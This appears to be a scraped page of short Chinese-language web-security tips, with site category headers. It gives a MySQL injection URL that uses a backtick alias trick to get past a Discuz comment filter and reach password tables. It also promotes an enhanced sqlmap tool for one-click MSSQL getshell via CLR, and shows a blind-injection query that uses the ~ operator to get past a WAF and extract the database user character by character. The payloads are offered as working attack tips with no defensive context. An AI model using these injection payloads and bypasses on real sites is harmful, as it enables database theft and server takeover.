Quan


WEB安全 内网安全 终端对抗 威胁情报 搜索内容
WEB安全
MYSQL注入绕过注释符限制
很多时候可能会出现这样一个问题,对方的代码存在全局过滤# --(也就是防止你注释) 但在MYSQL中有一个别名特性,他会自动闭合另外一个反引号,因此可以这样用:
http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as statistic from pre_common_statuser,pre_ucenter_members as
P牛在绕过DZ的全局SQL防注入的时候就使用了这个操作。

https://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-074970
WEB安全
SQLMAP加强版:MSSQL注入,一键Getshell
这个工具看着挺牛逼的,因为他加强了SQLMAP对于MSSQL注入的相关操作。原有的--os-shell 依赖于xp_cmdshell,但现在用这个可以直接clr,非常牛逼

https://github.com/co01cat/SqlmapXPlus
WEB安全
WEB安全
WEB安全
MYSQL 盲注:巧用~绕过WAF
例如第一个字符是r 114,那么:
select * from student s where id=1 and 1=~113+ascii(substring(current_user,1,1))
而:
select * from student s where id=1 and 1=~114+ascii(substring(current_user,1,1))
不报错,并且之后>114的也不会报错,因此第一位就是114

https://t.zsxq.com/16yhp6LLv